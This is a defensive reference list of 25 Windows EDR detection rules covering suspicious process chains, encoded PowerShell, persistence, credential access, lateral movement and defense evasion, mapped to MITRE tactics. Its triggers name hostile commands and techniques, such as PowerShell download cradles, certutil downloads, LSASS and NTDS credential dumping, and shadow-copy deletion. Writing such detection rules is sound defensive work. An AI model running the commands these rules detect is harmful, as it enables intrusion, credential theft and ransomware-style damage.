EDR Alert Rules

🛡️ Top 25 EDR Detection Rules

🔴 Process Execution & Parent-Child Chains

1. Suspicious Child Process from Office Applications

  • Trigger: winword.exe, excel.exe, outlook.exe spawning cmd.exe, powershell.exe, wscript.exe
  • Why: Macro-based malware execution
  • Fields: parent_process_name, child_process_name, command_line

2. PowerShell Spawned from Unusual Parents

  • Trigger: services.exe, wmiprvse.exe, svchost.exe, wsmprovhost.exe, mmc.exe spawning powershell.exe Splunk
  • Why: Lateral movement / remote code execution
  • Fields: parent_process_name, process_name, command_line

3. Suspicious Explorer.exe Child Process

  • Trigger: explorer.exe spawning cscript.exe, wscript.exe, powershell.exe, rundll32.exe, mshta.exe, regsvr32.exe Detection.FYI
  • Why: DCOM abuse / Living-off-the-Land
  • Fields: parent_process, process_name, parent_args

4. Microsoft Exchange Worker Spawning Shell

  • Trigger: w3wp.exe with AppPool MSExchange* spawning cmd.exe, powershell.exe, pwsh.exe GitHub
  • Why: Web shell exploitation / ProxyShell/ProxyLogon
  • Fields: parent_process, process_name, process_args

5. Event Viewer Suspicious Child Process

  • Trigger: eventvwr.exe spawning cmd.exe, powershell.exe, mshta.exe ManageEngine
  • Why: UAC bypass / privilege escalation
  • Fields: parent_process_name, child_process_name, command_line

6. WMI Provider Spawning Command Shell

  • Trigger: wmiprvse.execmd.exe, powershell.exe, rundll32.exe
  • Why: Fileless remote execution and lateral movement — wmiprvse.exe spawning PowerShell or CMD is a key artifact Medium
  • Fields: parent_process, process_name, network_connection

🟠 Command Line & Script Execution

7. Encoded PowerShell Command (-enc / -e)

  • Trigger: powershell.exe with -e, -en, -enc, or -w hidden -e flags in command line ManageEngine
  • Why: Obfuscated payload delivery
  • Fields: process_name, command_line, parent_process_name

8. PowerShell Download Cradle

  • Trigger: powershell.exe command_line contains Invoke-WebRequest, IEX, DownloadString, WebClient
  • Why: Adversaries frequently abuse PowerShell’s ability to download and run code remotely — detection focuses on process starts and parent/child relationships enriched by command-line parameters Red Canary
  • Fields: command_line, process_name, network_destination

9. Base64 Encoded PowerShell

  • Trigger: powershell.exe + command_line contains base64
  • Why: Base64 encoding isn’t inherently suspicious but is a key indicator — worth monitoring as it detects a wide variety of malicious activity Red Canary
  • Fields: command_line, process_name, user

10. LOLBAS Abuse — Certutil for Download

  • Trigger: certutil.exe with -urlcache, -decode, -f flags
  • Why: Abusing trusted Windows binaries to download malware
  • Fields: process_name, command_line, network_connection

11. Scheduled Task Created via schtasks.exe

  • Trigger: schtasks.exe /create with /sc, /tr, /ru SYSTEM
  • Why: Adversaries including Ryuk ransomware and NOBELIUM leverage schtasks.exe for lateral movement, persistence, and execution Splunk
  • Fields: command_line, parent_process, user, task_name_entropy

12. Service Installation via sc.exe / services.exe

  • Trigger: sc.exe create or Event ID 7045 (new service installed)
  • Why: EDR must alert on new services installed outside maintenance windows — often linked to privilege escalation or lateral movement CyberDefenders
  • Fields: command_line, service_name, binary_path, user

🟡 Persistence & Registry

13. Registry Run Key Modification

  • Trigger: Write to HKLM\Software\Microsoft\Windows\CurrentVersion\Run or HKCU\...\Run
  • Why: Registry Run Keys are one of the most common persistence mechanisms — EDR should alert on all modifications to these keys CyberDefenders
  • Fields: registry_key, registry_value, process_name, user

14. Startup Folder File Drop

  • Trigger: File created in C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
  • Why: Persistence without registry changes
  • Fields: file_path, parent_process, file_hash

15. WMI Event Subscription Creation

  • Trigger: WMI class __EventFilter, __EventConsumer, __FilterToConsumerBinding created
  • Why: Fileless persistence — survives reboots, no disk artifacts
  • Fields: wmi_namespace, query, consumer_command, process_name

🔵 Credential Access

16. LSASS Memory Access (Mimikatz Pattern)

  • Trigger: Process (non-system) opens handle to lsass.exe with PROCESS_VM_READ
  • Why: Credential dumping — maps to MITRE T1003.001
  • Fields: target_process, source_process, access_rights, user

17. SAM/NTDS Database Access

  • Trigger: Access to C:\Windows\System32\config\SAM, NTDS.dit
  • Why: Offline credential harvesting
  • Fields: file_path, process_name, user, timestamp

18. Suspicious Token Manipulation / SeDebugPrivilege

  • Trigger: Process requesting SeDebugPrivilege, SeImpersonatePrivilege
  • Why: Indicators of privilege escalation — look for processes requesting uncommon privileges, especially low-privilege processes spawning elevated children CyberDefenders
  • Fields: privilege_name, process_name, parent_process, integrity_level

🟢 Network & Lateral Movement

19. Suspicious Network Connection from Non-Browser Process

  • Trigger: powershell.exe, cmd.exe, mshta.exe, wscript.exe making outbound connections on ports 80/443/4444/8080
  • Why: C2 beaconing / data exfiltration
  • Fields: process_name, destination_ip, destination_port, protocol

20. SMB Lateral Movement — PsExec Pattern

  • Trigger: psexec.exe or PSEXESVC service creation + C$/ADMIN$ share access
  • Why: Adversaries abuse psexec.py (Impacket) using administrative shares and hardcoded parameters — a reliable detection signature Splunk
  • Fields: process_name, command_line, remote_host, share_name

21. RDP Brute Force / Unusual RDP Login

  • Trigger: Multiple failed Event ID 4625 + success 4624 Type 10 (RemoteInteractive) from single IP
  • Why: Brute force leading to unauthorized RDP access
  • Fields: source_ip, destination_host, logon_type, account_name, failure_count

22. WinRM / WSMan Suspicious Child Process

  • Trigger: WSMProvHost.exe as parent of cmd.exe, powershell.exe, rundll32.exe Medium
  • Why: PowerShell Remoting abuse for lateral movement
  • Fields: parent_process, child_process, command_line, source_host

⚫ Defense Evasion

23. Rundll32 / Regsvr32 with Unusual Arguments

  • Trigger: rundll32.exe or regsvr32.exe loading from %TEMP%, %APPDATA%, network paths, or scrobj.dll
  • Why: Proxy execution to bypass application whitelisting
  • Fields: command_line, loaded_dll, network_connection, parent_process

24. Process Injection Indicators

  • Trigger: VirtualAllocEx + WriteProcessMemory + CreateRemoteThread API calls across processes
  • Why: Code injection to hide in legitimate processes (T1055)
  • Fields: source_process, target_process, api_calls, memory_region

25. Volume Shadow Copy Deletion

  • Trigger: vssadmin.exe delete shadows, wmic shadowcopy delete, bcdedit /set recoveryenabled No
  • Why: Pre-ransomware step — disables recovery options
  • Fields: command_line, process_name, parent_process, user

📊 Quick Reference Table

#Rule NameKey FieldsMITRE Tactic
1Office App Spawning Shellparent_process, child_processExecution
2PS from Unusual Parentparent_process, command_lineLateral Movement
3Explorer DCOM Abuseparent_args, process_nameDefense Evasion
4Exchange Worker Shellparent_process, process_nameInitial Access
5Eventvwr Child Processparent_process, child_processPrivilege Escalation
6WMI Shell Spawnparent_process, networkLateral Movement
7Encoded PowerShellcommand_line (-enc)Execution
8PS Download Cradlecommand_line, destinationExecution
9Base64 PowerShellcommand_lineDefense Evasion
10Certutil Downloadcommand_line, networkDefense Evasion
11schtasks Creationcommand_line, task_namePersistence
12Service Installationservice_name, binary_pathPersistence
13Run Key Modificationregistry_key, processPersistence
14Startup Folder Dropfile_path, hashPersistence
15WMI Event Subscriptionwmi_class, consumerPersistence
16LSASS Accesstarget_process, access_rightsCredential Access
17SAM/NTDS Accessfile_path, processCredential Access
18Token Manipulationprivilege_name, integrityPrivilege Escalation
19Non-Browser Networkprocess, dest_ip, portC2 / Exfiltration
20PsExec SMB Patterncommand_line, shareLateral Movement
21RDP Brute Forcesource_ip, logon_typeInitial Access
22WinRM Child Processparent_process, childLateral Movement
23Rundll32 Abusecommand_line, dll_pathDefense Evasion
24Process Injectionapi_calls, target_processDefense Evasion
25Shadow Copy Deletioncommand_line, vssadminImpact

These rules are the backbone of detection engineering